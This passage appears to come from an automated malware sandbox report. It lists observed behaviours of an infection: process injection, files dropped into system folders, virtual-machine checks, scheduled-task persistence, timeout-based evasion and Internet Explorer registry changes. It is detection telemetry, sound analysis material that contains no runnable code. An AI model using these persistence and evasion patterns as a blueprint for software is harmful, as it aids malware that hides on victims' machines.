PID 7728 set thread context of 7684 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 1160 set thread context of 7692 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 8080 set thread context of 2624 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7724 set thread context of 7868 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7760 set thread context of 7748 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7704 set thread context of 8068 N/A C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe
PID 2368 set thread context of 1768 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7216 set thread context of 7244 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7508 set thread context of 7532 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 4484 set thread context of 4520 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 4952 set thread context of 5044 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 4728 set thread context of 4804 N/A C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe
PID 4676 set thread context of 4880 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 3336 set thread context of 3376 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 3872 set thread context of 3892 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 3960 set thread context of 3964 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 7612 set thread context of 3184 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 328 set thread context of 1272 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 4660 set thread context of 4964 N/A C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe C:\Users\Admin\AppData\Local\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\8BAE.exe
PID 1520 set thread context of 828 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
PID 5000 set thread context of 3152 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\Windows Media Player\ZHavetohamo.exe C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Windows Media Player\ZHavetohamo.exe.config C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-4ITOB.tmp C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-TAU4D.tmp C:\Users\Admin\AppData\Local\Temp\is-JOLEN.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe C:\Users\Admin\AppData\Local\Temp\is-1V4CJ.tmp\46807GHF____.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f761390.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7BE8.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI836A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2DBC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI780F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI40C1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6B40.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7A52.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI3E60.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2501.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4390.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI46EB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI757F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7ED6.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1D33.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI71F5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5E33.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2B0C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f761392.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5FC9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f761392.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2724.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2909.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f761394.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f761390.msi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\avwvuuw N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\avwvuuw N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\avwvuuw N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\avwvuuw N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\avwvuuw N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\avwvuuw N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat19c6762a08beae.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\affe4087-e0fd-4750-b505-c138bf12a05d\build2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\cmd.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0dd594b4da7d701 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca00000000020000000000106600000001000020000000b7b97bafaf12a814644fbc0a36a8a883c300644180615de4bb42f2a3aa38b378000000000e8000000002000020000000fa747aca114ff0a06827ae6352122f1dfbf71942d7051b20b4e1b3ed7f77dcb09000000024a72966153aeede18a7c00d1be336173156f32ee91a0b9108a8bca5d97fc4a911090cee241516605509f30e3355cb8958233ffafa72c234fb31c6538b520ced4fe97648abb6a0ce9145d4925ce745b22cfb20c723bb73a61255331059c612152def1e676becf19f20ab2759c202bc3aa6993f079cfbf55504f2fce86bcaded05a60304288250ab7733359599de03b4c4000000051a5c3440e8440e92822fb6609ae7504ecb41df5770a71ef42911a840f1b66288e2eb466eadb5f7a00c991dc3cfe5a3351dcbe74d061e104517b4c8d28d7a262 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000009d3681a36b624ecd17140cdbbcb5be7d21eb266b4c68c57d68e58e37e4afed41000000000e8000000002000020000000dcf69982cbee2b98c3fab434fb8c0ff34fe03a05320d0859c9d5786b39a33acff0040000aba0d8a5e2573e7163650b8f5e4fdfeaa9dc42f60e736d55a8424b6fe4340578930f15f2754d5218ec12435c39614957bdb22a65162c51666554094e8206beda4f0855cb88c791e00e843bf1adaf92c4a33b5a8aa210aff6661a6eb2fe8a4d3f36f0fa35e66e716d593ff93dec2395cf2ff347ce3fa3a3d2c92323b42cf25d38e95a0594f8d51a5229b0e9a99e6ac564f7450616e6d9545fe2090fb5955ea71a5353faf2f89ba3086ddb67eae6d831237b7212dbe1148cd871c3df2faa52b851774e2096d577cd3a706ca3c46e84abdce97e1a799e781ed6051fffb5226297690deeac4272a40d53a92aa5f66f982cfdb02aeb24cb96c116685d4d924881861df732d34b87534a13844557b513b1a89ef0dece096f71bed2ea3284ca0ff5550031dc10f84ce086a3b9ee5d4a580e8748a59df709d434956809c189d45216db4e442e676f98faf2227038cc6eab0979ccbca382cf13d6ebe26d8804e8863ef0525736ca5e988cdb9cc6ea1578320b4f3c3e698aa3af38cec6075c6181d66ce876320374f5f4ebc67a06bd4793ceccbbe4895b04cb09d5851b404f810ebe20dafb1e2169273ad5c7ce0dba4497ad053a405c5ef3ca1b46f5db003c5ef469bf0659ab94afc342ba9325dbf7c27ac23d6b87f3539175eed3c8355c764e71bb547fc92e43c2b0c56bd27a6345608e942f1039875cc7b20b75f1c76f1232a0e6fb9368e0e431eb3d2a6d6d910779b680e55462692be1d2774ea4ddfda4a0a4017adc7ab7e37c271ca6dbd0ddeb3aaa912b13d2a0089321080ed8583ac64bf00835f5e9b4a9227751db67d64c3555507e194385549df91fc1e6b4c5f61521e40385209fa815c47b887debffd578635f1d724c47b01499c500d5865370297436003a53d2c160cbe7117ab14048633e67123327477c403962ffa6e3340c5e29ec81dee20bd74afa3c22de8f293573ab652541e2ec94a90340b911409aebde5f43bdbeae5fb2dc7ff1cb09f641a242628f80009d8be4683ca9d9e0bfec0f6a210dae409df71ca799d8dd834cea4d6a1bd46617a12fbb5a5bc2e711bba9aa3f452f9da7309b2076c75e7434ec164d657563629e8fa46e1157a387eaa77f5ed6527e9508b003c328134e6f86f3a24776c41fefe4051d0783600c9a7f23a5b233251f97311672e00323370ed18998636e5ba9fe32353d88a19cae9a608fee9a4516030222b68c3eb2d6999c2154bc7ee00c1e52e8aaee7900c44e7e1af3634549624482bc1fa05b9b9e481ef28dcccb01ebdf4d7121bb4274c669992b607612d67c997680e49dd34a4b39c23c63e8f94142c4a46978826c55568e7a69702a65ac6c2c92a390846ff9d87f5f2589f0a07bc1b140c0d28369a15ba22240221bc7671c3a78be93d1090fb2a69cb6974d4d058000e3a17f463e3b15d999a5bbd7d26f614f7f24d8f85202e69c5204420e82e3be1c2769527dd73f71016c57303e976645f079b10682a9e2f76583934d39d662182fc4f01e00097b72105e011b6b02be355ba3d069e0afdacd6e314c8db25a8649c3d22c42e96c1d32da880bf5a2faf2d05c90ffb497e59e737ba8a6ec0eb25e627854c4d26a75fb622a826be87365dfe58b446db164de8362fbca292590937ebcb17e73c4b450f630ac3eeb7284f7db5ab908a11fe23edbc171aa8cb91f8d0294e2164afc9f03ca723538aba9487ef45561e49aa9267eafcee3708408dcfc6f3e52f5aed37d4094c2a510df4c9fda3f85370fc60a331645cddcf7926ff968672470dccfd35840000000ff97314e4587d5a4f8f7f51aff5b1ae3e36487c91d376527a1c2a9d4c7f1c45957446bb04e19c63595f241525abd25315e40de0161682a95ac7d6ff68df5c406 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000006d36882dd280068e164d92db32dd17a3509bc02b5b3c50f71d6267bb18af16c7000000000e80000000020000200000003c2b8713e79d726d6320a21c6f7332dec36c6cc961e074af8657f7af94ebd5272000000016662fd3f087f26db797847107eaf6772f860f0ad5ee2da030ea584e7674dcb740000000581a6a632d571adb3fb28150c3e9a7686a9e09ecae6c694031e4c6062a7955c4302123f8b91562801270d795fda6d4aa967dfca6755e58013c577ec4fda2d40a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{68F96110-1340-11EC-A404-D2CAC2128933} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 